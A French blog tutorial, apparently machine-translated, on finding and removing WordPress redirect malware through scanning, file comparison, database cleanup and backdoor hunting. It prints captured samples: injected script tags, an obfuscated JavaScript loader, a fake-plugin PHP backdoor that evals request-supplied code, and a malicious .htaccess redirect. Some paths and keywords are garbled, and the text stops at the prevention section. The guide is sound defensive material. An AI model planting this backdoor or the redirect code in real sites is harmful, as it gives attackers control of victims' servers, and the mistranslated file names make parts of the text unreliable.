Piratage de redirection WordPress ? Comment nettoyer un site web ?

imprimer · Время на чтение: 27мин · par · Publié · Mis à jour

jouerÉcoutez cet article

WordPress est infecté par un malware de redirection-redirection. Redirection malveillante.

Redirection WordPress malveillanteRedirection malveillante vers WordPress. Si votre site Web WordPress ou votre panneau d'administration redirige automatiquement vers un site de spam, votre site Web a probablement été piraté et infecté par un logiciel malveillant de redirection. Alors, que pouvez-vous faire avec un malware de redirection WordPress piraté sur votre site ? Tout d'abord, confirmez si vous avez un hack en scannant votre

Il est important de se rappeler que le temps est votre meilleur ami ici. Ne perdez pas de temps à vous en préoccuper. Nous réparerons complètement le piratage et votre site pourra être nettoyé. Mais il faut aller vite.

Je vais vous guider à travers les étapes pour vous aider à supprimer les redirections malveillantes de votre site, réparer votre site et vous assurer que cela ne se reproduise plus. Avec plusieurs variantes du piratage de redirection WordPress, il peut être difficile d'accéder à la racine de celui-ci. Cet article vous aidera à trouver et à supprimer rapidement et étape par étape les logiciels malveillants.

Le contenu de l'article :

Que signifie une redirection piratée (redirection malveillante) dans WordPress ?

Une redirection WordPress piratée est une redirection malveillante.
Redirection piratée WordPress se produit lorsqu'un code malveillant est injecté dans votre site Web, qui redirige ensuite automatiquement vos visiteurs vers un autre site Web. Généralement, le site Web cible contient du spam, des produits pharmaceutiques du marché gris ou des services illégaux.

Il existe de nombreux types de logiciels malveillants, tels que les logiciels malveillants favicon, qui provoquent ce comportement, donc le piratage de redirection de logiciels malveillants WordPress est un terme générique faisant référence au symptôme prédominant : les redirections malveillantes.

Ce type de piratage affecte des millions de sites Web et entraîne chaque jour des pertes épouvantables. Les sites Web perdent des revenus, une image de marque et des classements SEO, sans parler du stress de la reprise.

Cependant, le pire avec le piratage, c'est qu'il ne cesse de s'aggraver. Le logiciel malveillant se propage à travers les fichiers et les dossiers et même la base de données de votre site Web, se copiant et utilisant votre site Web pour infecter les autres.

J'aborderai les conséquences spécifiques d'un piratage plus loin dans cet article, mais il suffit de dire que votre priorité pour sauver votre site Web est d'agir immédiatement et de ne pas tergiverser.

Comment savoir si mon site WordPress est redirigé vers le spam ?

Avant de régler le problème avec rediriger un site WordPress piraté, nous devons d'abord établir que votre site a bien été piraté. Comme pour l'infection, les hacks ont des symptômes. Et puis, une fois que vous avez identifié les symptômes, vous pouvez confirmer le diagnostic avec quelques tests.

Comme indiqué précédemment, les redirections automatiques sont un signe certain d'un hack de redirection WordPress. Les redirections de spam peuvent se produire à partir des résultats de recherche, sur des pages spécifiques ou même lorsque vous essayez de vous connecter à votre site Web. Le problème avec les redirections est qu'elles ne se produisent pas toujours de manière cohérente ou fiable.

Par exemple, si vous êtes allé sur votre site et qu'il a été redirigé, il se peut que cela ne se produise pas la deuxième, la troisième ou la quatrième fois. Les pirates sont intelligents et installent un cookie pour s'assurer que le problème ne se produit qu'une seule fois.

Le résultat est qu'il est facile de tomber dans un faux sentiment de sécurité lorsque vous avez l'impression qu'il pourrait s'agir d'un accident. Il y a une petite chance que ce soit un bogue dans le code, mais quand je dis "petit", je veux dire une chance infinitésimale.

Vérifiez les signes d'une redirection piratée dans WordPress

En règle générale, les hacks se manifestent de différentes manières. Individuellement, il peut s'agir d'erreurs de site Web telles qu'un ancien code de suivi, mais si vous voyez deux ou plusieurs de ces symptômes sur votre site Web, vous pouvez être sûr que votre site Web a été piraté.

  • Le site WordPress redirige vers un site de spam: Un symptôme classique d'un hack de redirection WordPress. Selon la variante du logiciel malveillant, la redirection peut se produire de différentes manières ou à différents endroits de votre site.
    Redirections automatiques: Les logiciels malveillants redirigent automatiquement vos visiteurs vers des sites de spam lorsque quelqu'un visite votre site. Cela se produit également si quelqu'un accède à votre site depuis Google ou Yandex. Généralement, vous serez également redirigé si vous essayez de vous connecter à votre site.
    Redirection de lien: Quelqu'un clique sur un lien puis est redirigé vers un autre site Web. Ceci est particulièrement intelligent car les visiteurs cliquent sur des liens s'attendant à être redirigés vers un autre emplacement de toute façon.
    Redirections pour les appareils mobiles uniquement: Ce n'est que si votre site Web est accessible via un appareil mobile qu'il est redirigé.
  • Les résultats de Google affichent le message "Le site a peut-être été piraté": Lorsque votre site Web apparaît dans les résultats de recherche, un petit message apparaît : "Le site a peut-être été piraté" - apparaîtra juste en dessous du titre. C'est la façon dont Google avertit les visiteurs d'un site potentiellement piraté.
  • Liste noire de Google: Le plus grand drapeau rouge de tous — littéralement — la liste noire de Google est un signe certain que votre site a été piraté. Même si vos visiteurs utilisent un moteur de recherche différent, ils utilisent également la liste noire de Google pour signaler les sites piratés.
  • Interdiction du site dans Yandex: également un signe certain d'un site Web piraté, les positions de votre site Web apparaîtront dans les résultats de recherche Yandex. Peut-être que la page principale restera, mais ce n'est pas un fait.
  • Google Ads signale les scripts sur votre site Web : Si vous essayez de faire de la publicité sur votre site Web, Google Ads explorera votre site Web et vous avertira des scénarios de redirection dans vos publications ou vos pages.
  • L'hébergeur a suspendu votre compte: Les sites Web suspendent les sites Web pour plusieurs raisons, et les logiciels malveillants sont l'une des principales. Si vous voyez ce message lorsque vous essayez d'accéder à votre site Web, vérifiez votre courrier électronique pour une raison quelconque. Vous pouvez également contacter leur équipe d'assistance.
  • Les gens se plaignent de votre site: La partie la plus terrible des hacks est que les administrateurs de sites Web sont généralement les derniers à être informés d'un piratage, à moins qu'ils n'aient un bon plugin de sécurité installé. Tant de gens le découvrent parce que les visiteurs et les utilisateurs du site Web se plaignent du fait que le site Web est redirigé vers le spam ou même de recevoir du courrier indésirable.

Si vous voyez l'un des symptômes énumérés ci-dessus, c'est une bonne idée d'écrire des informations à ce sujet. Quel navigateur avez-vous utilisé ? Quel appareil avez-vous utilisé ? Ces informations peuvent aider à identifier le type de logiciel malveillant de piratage WordPress auquel vous êtes confronté et donc à l'éliminer plus rapidement.

Confirmez si votre site est infecté par un hack de redirection

La prochaine étape pour découvrir le symptôme est de s'assurer qu'il s'agit bien d'un hack. Le moyen le plus rapide de s'assurer que votre site Web est sensible aux redirections malveillantes consiste à analyser votre site Web.

1. Scannez votre site avec un plugin de sécurité

Si vous n'êtes toujours pas sûr sur 100 % que votre site Web a été piraté, utilisez un scanner en ligne gratuit pour confirmer. Un cas très courant est l'accès à votre site Web à partir d'un appareil mobile, ce qui indique un logiciel malveillant dans le fichier .htaccess. Ou celui que nous voyons souvent est un hack de page qui redirige automatiquement. Cela se produit lorsqu'il y a des logiciels malveillants dans la base de données.

Plus loin dans l'article, nous examinerons d'autres variantes de logiciels malveillants. À l'heure actuelle, je tiens à souligner que les logiciels malveillants directs piratés par WordPress peuvent se trouver presque n'importe où sur votre site.

Pour cette raison, chaque scanner le marquera différemment. Par exemple, Quttera signalera les logiciels malveillants comme suit :

Nom de la menace : Heur AlienFile gen

Et WordFence affichera un avertissement concernant tout un tas de fichiers inconnus, comme ceci :

* Fichier inconnu dans le noyau de WordPress : wp-admin/css/colors/blue/php.ini
* Fichier inconnu dans le noyau de WordPress : wp-admin/css/colors/coffee/php.ini
* Fichier inconnu dans le noyau de WordPress : wp-admin /css/colors/ectoplasm/php.ini

Ce sont de bons signes que votre site a été piraté car, comme nous le verrons plus tard, le dossier /wp-admin ne devrait contenir que les fichiers principaux de votre installation WordPress.

Cela dit, malheureusement, cela n'aide pas pour la désinstallation. Il existe plusieurs problèmes majeurs avec la façon dont les autres plugins de sécurité signalent les logiciels malveillants en raison de leurs mécanismes de détection. Il existe de nombreux faux positifs, des fichiers manquants et de nombreux autres problèmes. Votre site Web est important, alors choisissez judicieusement votre plugin de sécurité.

2. Scannez avec un scanner de sécurité en ligne

Vous pouvez également utiliser un scanner de sécurité en ligne comme Sucuri SiteCheck pour vérifier les logiciels malveillants de redirection piratés. Un scanner de sécurité en ligne ou un scanner externe scanne le code sur vos pages et publie des messages à la recherche de scripts malveillants.

Le seul problème avec un scanner frontal est qu'il ne peut scanner et ne scannera que le code auquel il a accès. C'est-à-dire essentiellement le code source des pages et des publications. Bien qu'il existe de nombreux logiciels malveillants de redirection piratés sur ces pages, il existe quelques options dans les fichiers principaux. Le scanner externe ne les affichera pas du tout.

Je conseille d'utiliser un scanner de sécurité en ligne comme outil de diagnostic de première ligne. S'il s'avère positif, vous pouvez être sûr qu'il est positif et travailler à réparer le piratage. S'il s'avère négatif, vous pouvez vérifier manuellement les endroits non scannés par le scanner frontal. De cette façon, vous pouvez éliminer une partie du travail manuel.

3. Analysez manuellement le site à la recherche de logiciels malveillants

Si vous utilisez un plug-in de sécurité pour rechercher des logiciels malveillants de redirection piratés, vous pouvez ignorer complètement cette section. Un bon plugin de sécurité fera exactement ce que je suggère ci-dessous, mais beaucoup plus rapidement et mieux.

Analyser votre site Web à la recherche de logiciels malveillants signifie essentiellement rechercher du code indésirable dans les fichiers et la base de données. Je comprends que le "code indésirable" est inutile en tant que référence, mais en raison des options, il n'y a pas une seule ligne que vous pouvez trouver rapidement et annoncer un hack.

Cependant, dans la section suivante, j'ai répertorié quelques exemples de logiciels malveillants trouvés sur d'autres sites Web. Et dans la section suivante, nous parlerons des endroits typiques où les logiciels malveillants sont injectés, en fonction du comportement de redirection observé.

À quoi ressemble le logiciel malveillant de redirection WordPress

J'exagère cette ligne dans cet article, mais les logiciels malveillants de redirection de hack WordPress ont de nombreuses options, et il n'y a donc pas d'extrait de code standard unique vers lequel pointer, "Recherchez ceci!"

Cependant, je peux vous donner une idée de ce à quoi ressemblent certains codes malveillants :

  • Le code peut se trouver quelque part dans l'en-tête de la page ou sur toutes les pages de la table wp_posts. Voici quelques exemples:

 

type='text/javascript' src='//www.dekeine.nl/wp-content/count.php?s=8131599557550&ver=5.7.2' id='hello_newscript5-js'>
 type='text/javascript' src='https://store.don/tkinhoo/ot./tw/m.js?w=085'>
 type='text/javascript' async src='https://db.d/live/rygoo/stra/tegy./com/js.min.js?s=p&'>
 type='text/javascript' src='https://coun/.tr/acks/tatis/icsss/./com/stm?v=l6.0.0'>
 type=text/javascript src='https://des/.coll/ectf/at/rac/ks./com/t.js'>
 src='https://js/donatel/firstly.ga/stat.js?n=ns1' type='text/javascript'>

  • Les tables wp_options peuvent avoir des URL inconnues dans site_url. Voici quelques exemples:
stat/traksatiticss dest/colecfattracks gotosecnd ws.stienernando

 

  • Les scripts peuvent également être obscurcis, ce qui signifie que vous devez les exécuter via un désobfuscateur en ligne pour extraire le code réel.

code obscurci

eval(StringfromCharCode32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,112,111,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116, 39,41,59,10,32,32,32,32,112,111,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,10,32,32,32,32,112,111,46,115,114, 99,32,61,32,39,104,116,116,112,115,58,47,47,106,115,46,100,101,118,101,108,111,112,101,114,115,116,97,116,115,115,46,103,97,47,115,116,97,116,46,106,115,63,118,61,110,52,39,59,10,32,32,32,32,118, 97,114,32,115,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,115,99,114,105,112,116,39,41,91,48,93,59,10,32,32, 32,32,115,46,112,97,114,101,110,116,78,111,100,101,46,105,111115,101,114,116,66,101,102,111114,101,40,112,11,44,32,115,41,59,112,32,32,44,32,115,41,59,11222,12,44,32

Et qu'est-ce que cela signifie concrètement :

(fonction() var po = document.createElement('script'); po.type = 'texte/javascript'; po.src = eloperatss.sat?v=n4'; var s = document.getElementsByTagName('script') [0];s.parentNode.insertBefore(po, s); )();
  • Les faux plugins peuvent avoir des fichiers qui ressemblent à ceci lorsqu'ils sont ouverts :
<?php /** * Plugin Name: Wp Zzz * Plugin URI: https://wpforms.com * Description: Default WordPress plugin * Author: WPForms * Author URI: https://wpforms.com * Version: 1.6.3.1 * */ function simple_init() { $v = "base".chr(54).chr(52).chr(95).chr(100).chr(101).chr(99)."ode"; if(isset($_REQUEST['lt']) && md5($_REQUEST['lt']) == $v("MDIzMjU4YmJlYjdjZTk1NWE2OTBkY2EwNTZiZTg4NWQ=") ) { $n = "file_put_contents"; $lt = $v($_REQUEST['a']);$n('lte_','<?php '.$lt);$lt='lte_';if(file_exists($lt)){include($lt);unlink($lt);die();}else{@eval($v($lt));}}else{if(isset($_REQUEST['lt'])){echo $v('cGFnZV9ub3RfZm91bmRfNDA0');}} } add_action('init','simple_init'); function my_custom_js() { echo ' '; } add_action( 'admin_head', 'my_custom_js' ); add_action( 'wp_head', 'my_custom_js' );
  • Les redirections mobiles indiquent les modifications apportées au fichier .htaccess. Le code ci-dessous redirige vers https://daily-prize-best/life/?u=y2ykaew&o=2xup89r&m=1&t=mns2.
RewriteEngine On RewriteRule ^.+\.txt$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.htm$ https://bit.ly/3iZl8mm [L] RewriteRule ^.+\.html$ https:/ /bit.ly/3iZl8mm [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . https://bit.ly/3iZl8mm[L] RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php[L]

Où rechercher les logiciels malveillants redirigés

WordPress est divisé en deux parties principales : les fichiers et la base de données. Le problème avec les logiciels malveillants de redirection piratés est qu'ils peuvent se trouver n'importe où.

Si vous savez comment modifier le code de votre site Web, vous pouvez trouver le code de redirection que j'ai mentionné aux endroits suivants. Téléchargez une copie de sauvegarde de votre site Web (fichiers et base de données) pour rechercher les modules complémentaires suspects.

Encore une fois, gardez à l'esprit qu'il existe des options telles que les redirections classiques, situationnelles, spécifiques à l'appareil ou même groupées. Le code sera différent pour chacun, tout comme l'emplacement.

A. Fichiers du site Web

  • Fichiers de base WordPressR : En commençant par les plus simples, /wp-admin et /wp-includes ne devraient pas être différents d'une nouvelle installation WordPress. Il en va de même pour les fichiers index.php, settings.php et load.php. Ce sont les fichiers principaux de WordPress et les paramètres ne leur apportent aucune modification. Comparez avec une nouvelle installation de WordPress pour voir s'il y a des changements. Le fichier .htaccess est un cas particulier. Un piratage de redirection mobile apparaîtra presque toujours dans ce fichier. Recherchez la règle d'agent utilisateur qui définit le comportement spécifique à l'appareil et recherchez le script de redirection.
  • Fichiers de thème actifs: Si vous avez plus d'un thème installé (ce qui n'est pas recommandé pour commencer), assurez-vous qu'un seul d'entre eux est actif. Ensuite, passez en revue vos fichiers de thème actifs tels que header.php, footer.php et functions.php pour un code étrange. Un bon moyen de tester cela consiste à télécharger des installations vierges à partir des sites des développeurs et à faire correspondre le code à ces fichiers. En règle générale, ces fichiers doivent être dans un format spécifique, c'est pourquoi le code poubelle ressort. Gardez à l'esprit que les paramètres modifieront également le code. De plus, si vous utilisez des thèmes ou des plugins annulés, vous pouvez arrêter les diagnostics ici, car nous pouvons vous assurer que vous avez été piraté à cause d'eux.
  • Faux plugins sur votre site: Oui, c'est le cas. Les pirates masquent les logiciels malveillants, les rendant aussi légitimes que possible. Allez dans le dossier wp-content/plugins et jetez un œil. Quelque chose que vous n'avez pas installé ? Des doublons bizarres ? Est-ce que l'un d'entre eux n'a qu'un ou deux fichiers dans ses dossiers ?

Voici quelques exemples:

/wp-content/plugins/mplugin/mplugin.php /wp-content/plugins/wp-zzz/wp-zzz.php /wp-content/plugins/Plugin/plug.php

Si vous avez beaucoup de plugins installés, il peut être difficile de tous les vérifier. La règle de base pour repérer les faux plugins est que, par convention, les noms de plugins légitimes commencent rarement par une majuscule et que leurs noms ne contiennent aucun caractère spécial autre que des traits d'union. Ce ne sont pas des règles, mais des conventions. Ne leur accordez donc pas trop d'importance afin d'identifier définitivement les contrefaçons. Si vous pensez qu'un plugin est faux, recherchez-le sur Google et trouvez la version originale dans le référentiel WordPress. Téléchargez-le à partir de là et vérifiez si les fichiers correspondent.

B. Base de données

  • tableau wp_posts: Des scripts malveillants sont souvent présents sur chaque page. Mais, comme nous l'avons déjà dit, les pirates sont très rusés. Consultez un bon échantillon de messages avant de décider qu'un hack n'existe pas. Une autre façon de vérifier le code de vos pages et publications consiste à vérifier le code source de la page à l'aide d'un navigateur. Chaque page de votre site possède un code HTML lisible par les navigateurs. Ouvrez le code source de la page et vérifiez l'en-tête, le pied de page et tout ce qui se trouve entre les balises de script pour les éléments qui semblent déplacés. La section d'en-tête contient des informations que le navigateur utilise pour charger cette page, mais qui ne sont pas présentées au visiteur. Les scripts de logiciels malveillants sont souvent cachés ici, ils se chargent donc avant le reste de la page.
  • table wp_options: vérifier siteurl. Il doit s'agir de l'URL de votre site Web dans les cas 99%. Si ce n'est pas le cas, c'est votre hack ici.

Cependant, ce n'est pas le moment d'essayer de supprimer quoi que ce soit. Vous devez être absolument sûr que les scripts Javascript ou PHP sont définitivement malveillants. Vous voulez vous débarrasser très rapidement des logiciels malveillants, mais vous précipiter vous mènera à un site en panne.

Autres moyens de vérifier les redirections de logiciels malveillants

Vous ne verrez peut-être pas tous les symptômes énumérés ci-dessus en tant qu'administrateur de site Web. Les pirates empêchent intelligemment votre adresse IP et votre compte de voir les résultats d'un piratage car ils veulent rester non détectés aussi longtemps que possible.

En outre, vous pouvez voir le symptôme une fois, puis ne pas pouvoir le recréer. Tout cela est très déroutant. Il existe plusieurs autres façons de vérifier les symptômes si vous ne les voyez pas directement sur votre site Web.

  • Vérifiez la console de recherche Google: Ils signaleront l'infection par un logiciel malveillant dans la section Problèmes de sécurité.
  • Utiliser un navigateur incognito pour accéder à votre site Webpour voir ce que voit le visiteur moyen
  • Vérifier les journaux d'activité pour une activité utilisateur inhabituelle, comme l'élévation des privilèges utilisateur ou la rédaction de messages.

La section suivante traite exclusivement de la suppression. Respirez profondément et prenez une tasse de thé ou de café. Passons à travers tout le processus ensemble.

Comment supprimer l'infection de redirection piratée de WordPress ?

Maintenant que nous savons que votre site Web redirige vers un autre site, vous devez agir rapidement. Au fil du temps, le nombre de piratages augmente de façon exponentielle car les logiciels malveillants se propagent à davantage de fichiers et de dossiers sur votre site Web. Cela augmente non seulement les dégâts, mais rend également la récupération beaucoup plus difficile.

Je suppose que vous avez déjà parcouru votre site Web avant d'atteindre cette section. Cependant, si ce n'est pas le cas, la première chose à faire est d'explorer votre site Web.

Il existe 2 façons principales de supprimer les redirections malveillantes de votre site Web. Je recommande fortement d'utiliser le plug-in de sécurité, car j'ai pu constater de visu les dommages que les hacks peuvent causer à un site Web.

1. (RECOMMANDÉ) Utilisez un plugin de sécurité pour supprimer le virus de redirection

Les plugins de sécurité sont utilisés pour supprimer les logiciels malveillants difficiles à détecter. Il vous suffit d'installer le plugin sur votre site et d'attendre quelques minutes que votre site soit restauré.

Si vous avez utilisé un scanner pour confirmer que votre site Web a été piraté, tout ce que vous avez à faire est de le mettre à jour et de récupérer votre site.

Il y a plusieurs raisons pour lesquelles il est recommandé d'utiliser de tels plugins :

  1. Supprimez uniquement les logiciels malveillants et laissez votre site intact ;
  2. Trouvez les portes dérobées que les pirates laissent pour se réinfecter, et supprimez-les également ;
  3. Pare-feu intégré pour protéger votre site contre le trafic malveillant.

Si vous ne pouvez pas accéder à wp-admin

Dans ce cas, contactez le service de suppression d'urgence des logiciels malveillants pour obtenir de l'aide. Un expert en sécurité dédié nettoiera rapidement votre site Web et s'assurera qu'il est de nouveau opérationnel en un rien de temps.

2. Supprimer manuellement les logiciels malveillants de redirection WordPress

Il est possible de supprimer les logiciels malveillants de redirection manuelle de votre site Web, mais il existe des conditions préalables pour le faire.

- Tout d'abord, vous devez savoir comment WordPress est configuré. De l'apparence des fichiers de base aux dossiers et fichiers que chaque plugin et thème crée pour fonctionner. La suppression d'un fichier nécessaire peut planter votre site, de sorte que votre site est non seulement piraté, mais également désactivé.

- Deuxièmement, vous devez être capable de distinguer le bon code du mauvais, c'est-à-dire logiciels malveillants. Le code malveillant est soit déguisé en code légitime, soit obscurci afin qu'il ne puisse pas être lu. Il est très difficile de distinguer le bon code du mauvais code, c'est pourquoi de nombreux scanners souffrent de faux positifs.

NoterR : Vous pouvez engager un expert WordPress pour supprimer les logiciels malveillants. Gardez à l'esprit que les experts en sécurité coûtent cher et prendront du temps pour supprimer un piratage.

De plus, ils ne garantissent pas que vous ne rechuterez pas. Cependant, je recommande toujours cette ligne de conduite plutôt que d'essayer de supprimer manuellement les logiciels malveillants.

D'accord, ce sont les mises en garde. Voici les étapes pour supprimer les logiciels malveillants de redirection de votre site Web :

1. Sauvegardez votre site Web

Assurez-vous de faire une sauvegarde avant de faire quoi que ce soit. Même si le site est piraté, il fonctionne toujours. Donc, si quelque chose ne va pas pendant le processus de suppression des logiciels malveillants, vous disposez d'une sauvegarde sur laquelle revenir. Un site piraté est difficile à nettoyer. Un site Web défectueux est encore plus difficile à nettoyer et parfois impossible à récupérer.

L'hébergeur peut suspendre votre site ou même le supprimer. Ensuite, accéder à votre site Web, même pour le gratter, est un problème majeur. Vous devrez contacter l'équipe d'assistance de l'hébergeur pour accéder au site suspendu, mais un site supprimé ne peut pas être fait sans sauvegarde.

2. Téléchargez une version propre de WordPress

Téléchargez de nouvelles installations WordPress ainsi que tous les plugins et thèmes que vous utilisez. Les versions doivent correspondre à ce qui se trouve sur votre site.

Après les avoir téléchargés, vous pouvez utiliser les fichiers vierges pour les comparer aux fichiers de votre site Web. Vous pouvez utiliser le vérificateur de différences en ligne pour trouver les différences, car nous ne recommandons certainement pas de les parcourir manuellement.

Il s'agit essentiellement d'une correspondance de signature, ce que font la plupart des scanners de sécurité. Cependant, vous savez au moins maintenant quels fichiers et dossiers sont nécessaires au bon fonctionnement de votre site. Ne rien supprimer à ce stade. Vous venez de définir la ligne de base pour comprendre quels fichiers sont nécessaires.

3. Recherchez et supprimez les logiciels malveillants de redirection

C'est peut-être l'étape la plus difficile du processus. Comme je l'ai dit, vous devez être capable de distinguer le bon code du mauvais code, puis de le supprimer ou de le remplacer si nécessaire.

Nettoyer les fichiers principaux de WordPress

Il est extrêmement important d'obtenir la même version de WordPress que votre site Web, sinon vous risquez de rencontrer un plantage du site Web. Une fois téléchargé, utilisez cPanel ou FTP pour accéder aux fichiers de votre site Web et remplacez les dossiers suivants :

— /wp-admin
/wp-enables

Ces dossiers sont utilisés par WordPress pour exécuter et charger votre site Web et ne sont pas du tout destinés à stocker le contenu de l'utilisateur. C'était la partie facile. Vérifiez maintenant les fichiers suivants pour le code étrange :

- index.php
wp-config.php
wp-settings.php
- wp-load.php
- .htaccess

De plus, il ne devrait y avoir aucun script PHP dans le dossier /wp-uploads. Je me rends compte que le "code étrange" est très vague, mais comme nous l'avons déjà dit, un logiciel malveillant de redirection WordPress piraté a de très nombreuses options.

En tant que tel, je ne peux pas vous dire exactement quel code vous verrez dans l'un de ces fichiers. Si vous comprenez comment le code fonctionne, vous pouvez vous référer à la liste des fichiers WordPress pour comprendre ce que chacun fait et voir si l'un des codes fait quelque chose de différent. Une fois que vous êtes sûr d'avoir trouvé ce code, supprimez-le.

Nettoyez les thèmes et les plugins des logiciels malveillants

Tous les fichiers et dossiers associés au thème et au plugin sont stockés dans le dossier /wp-content. Vous pouvez vérifier chacun des fichiers de votre site Web pour voir où il y a une différence dans le code.

Un mot d'avertissement ici : tous les changements ne sont pas mauvais. Si vous avez personnalisé l'un de vos plugins ou thèmes - ce que vous avez probablement -, il y aura des différences par rapport à une installation propre. Si cela ne vous dérange pas de perdre ces paramètres, vous pouvez continuer et remplacer les fichiers en bloc.

Vous souhaiterez probablement conserver le travail que vous avez effectué, alors commencez à examiner attentivement chacune des différences. Si vous pouvez suivre la logique du code, vous pouvez comprendre comment les fichiers interagissent entre eux et avec le reste de votre site. Cela devrait vous permettre de trouver le logiciel malveillant et de le supprimer.

Si vous avez un nombre important de thèmes et de plugins, cela peut être une tâche ardue. Voici quelques bons points de départ :

  • Fichiers de thème actifs
    - header.php
    — footer.php
    — functions.php
  • Plugins vulnérables
    - Quelqu'un a-t-il été piraté récemment
    - Y en a-t-il qui ne sont pas mis à jour
  • Faux plugins
    - Très peu de fichiers
    - Doublons évidents

Certains fichiers malveillants semblent inoffensifs et imitent souvent les vrais noms de fichiers. C'est là que les installations propres sont utiles, mais contactez également les développeurs de plugins et de thèmes pour obtenir de l'aide si vous n'êtes pas entièrement sûr.

Supprimer les logiciels malveillants de la base de données WordPress

Utilisez phpMyAdmin pour télécharger la base de données à nettoyer. Vérifiez ensuite dans les tableaux les contenus suspects tels que les URL de spam ou les mots-clés. Supprimez soigneusement ce contenu, en vous assurant qu'il s'agit d'un mauvais code et non d'un bon code modifié.

Vérifiez notamment les tableaux suivants :

— wp_options
— wp_posts

Selon la taille de votre site Web, cela peut prendre beaucoup de temps. En règle générale, si le logiciel malveillant se trouve dans votre table wp_posts, il se trouvera dans chaque publication. Si vous avez des centaines de publications avec beaucoup de contenu, le nettoyage manuel est une tâche monumentale.

Cependant, une fois que vous avez identifié le script malveillant, vous pouvez utiliser SQL (ou demander à quelqu'un qui comprend SQL) de supprimer le script de chaque message. La mise en garde ici est que vous ne pouvez pas être sûr qu'il s'agit du seul logiciel malveillant sur la table.

En outre, en particulier avec les sites de commerce électronique, vérifiez si vous supprimez des informations importantes sur l'utilisateur ou la commande.

4. Supprimer les portes dérobées

Maintenant que vous avez nettoyé votre site Web des logiciels malveillants, recherchez les portes dérobées. Ce sont des points d'entrée vers votre site Web qu'un pirate informatique laisse derrière lui afin qu'il puisse réinfecter votre site Web si son hack d'origine est découvert.

Les portes dérobées peuvent se trouver à plusieurs endroits. Un code à rechercher :

  • grade
  • base64_decode
  • gzinflate
  • preg_replace
  • str_rot13

Un mot d'avertissement : ils ne sont pas nécessairement tous mauvais. Ce sont des scripts PHP légitimes qui peuvent être légèrement modifiés pour servir de portes dérobées. Soyez prudent lorsque vous en supprimez sans une analyse appropriée.

5. Recharger les fichiers nettoyés

Maintenant que vous avez supprimé le hack, vous devez reconstituer votre site. Utilisez un gestionnaire de fichiers pour télécharger à nouveau des fichiers et phpMyAdmin sur cPanel ou VestaCP pour remplacer votre site Web.

Ceci est très similaire à la façon dont vous restaurez manuellement une sauvegarde et signifie que vous devez d'abord supprimer les fichiers et la base de données existants. Si vous avez accidentellement sauté l'étape de sauvegarde au début, faites-le maintenant. La sauvegarde de votre site Web, même piraté, vous évitera des soucis en cas de problème.

6. Effacer le cache du site

Maintenant que votre site Web nettoyé est chargé, videz votre cache. Le cache stocke les versions précédentes de vos pages et de votre contenu et les montre aux visiteurs de votre site. Pour que votre site nouvellement nettoyé se comporte comme prévu, vous devez vider le cache.

7. Vérifiez chacun des plugins et thèmes

La triste réalité des logiciels malveillants est qu'ils peuvent se cacher presque n'importe où. Puisque vous avez passé tout ce temps et cette énergie à nettoyer manuellement votre site Web, cela vaut la peine de prendre quelques minutes supplémentaires pour vous assurer que vos efforts sont un succès.

Je vous recommande d'utiliser FTP pour cela car il faudra beaucoup de travail pour modifier les fichiers du site Web.

  • Désactivez tous vos plugins et thèmes en renommant le dossier wp_contents en autre chose.
  • Ensuite, activez-les un par un, en vérifiant à chaque fois votre site pour une redirection.
  • S'il n'y a pas de problèmes, vous savez que les plugins et les thèmes ne contiennent pas de logiciels malveillants.

Pourquoi je déconseille fortement de supprimer manuellement les redirections de pirates

Vous vous demandez peut-être pourquoi je ne recommande pas de supprimer les hacks de cette façon. Pensez aux hacks de la même manière que vous penseriez à une maladie, comme le cancer ou un os cassé.

Vous préféreriez laisser le soin de ces maladies à des médecins qui sont des professionnels formés ayant une vaste expérience dans leur traitement. Les personnes non formées font plus de mal que de bien. Demandez à n'importe quel médecin qui a dû faire face à une fracture osseuse mal cicatrisée.

Il y a quelques choses qui peuvent mal tourner lors de la suppression manuelle d'un piratage :

  • Les logiciels malveillants peuvent se propager à des endroits inattendus et sont difficiles à supprimer sans erreur.
  • La suppression des logiciels malveillants ne suffit pas si les vulnérabilités et/ou les portes dérobées ne sont pas corrigées.
  • Une suppression inepte peut parfois casser d'autres parties du site Web.
  • Les grands sites (par exemple, les magasins de commerce électronique) seront très difficiles et longs à parcourir manuellement.
  • Le temps presse, car les hacks s'aggravent de façon exponentielle avec le temps.
  • Peut ne pas être en mesure d'accéder à votre site Web si l'hébergeur a banni votre compte

En termes simples, il existe une énorme marge d'erreur dans un site Web piraté. Il existe un danger très réel de sortir de ce processus dans une position pire que celle dans laquelle vous avez commencé. Il est préférable d'utiliser un bon plugin de sécurité pour supprimer les scripts de piratage.

Le site Web est redirigé vers le spam : comment cela a-t-il affecté mon site Web ?

Les sites Web sont des mélanges complexes de logiciels, et à la base, aucun logiciel n'est piratable sur le 100%. C'est la réalité de tout logiciel, des jeux 8 bits d'antan aux énormes systèmes d'information de gestion utilisés par les banques.

Les sites Web WordPress ne sont pas différents. Alors que les fichiers de base de WordPress sont les plus proches d'être à l'épreuve des balles, on ne peut pas en dire autant des plugins et des thèmes. Les plugins et les thèmes ajoutent des éléments dynamiques, des fonctionnalités et une conception aux sites Web, et un site sans eux serait sûr, mais aussi statique et ennuyeux.

Voici une liste des raisons pour lesquelles les sites WordPress sont piratés :

  1. Vulnérabilités dans les plugins et les thèmes ;
  2. Mauvais mots de passe et comptes d'utilisateurs compromis ;
  3. Portes dérobées dans les thèmes et plugins annulés ;
  4. Attaques de script XSS ;
  5. Attaques par force brute avec des bots.

Comme indiqué précédemment, la sécurité des sites Web ne doit pas être prise à la légère. Vous avez maintenant une expérience directe de la difficulté de réparer un piratage, donc idéalement, vous devriez avoir une stratégie en place pour vous assurer que cela ne se reproduise plus.

Comment empêcher les hacks WordPress Redirect à l'avenir ?

Maintenant que vous avez un site Web propre, les prochaines étapes consistent à empêcher votre site Web WordPress d'être redirigé vers le spam.

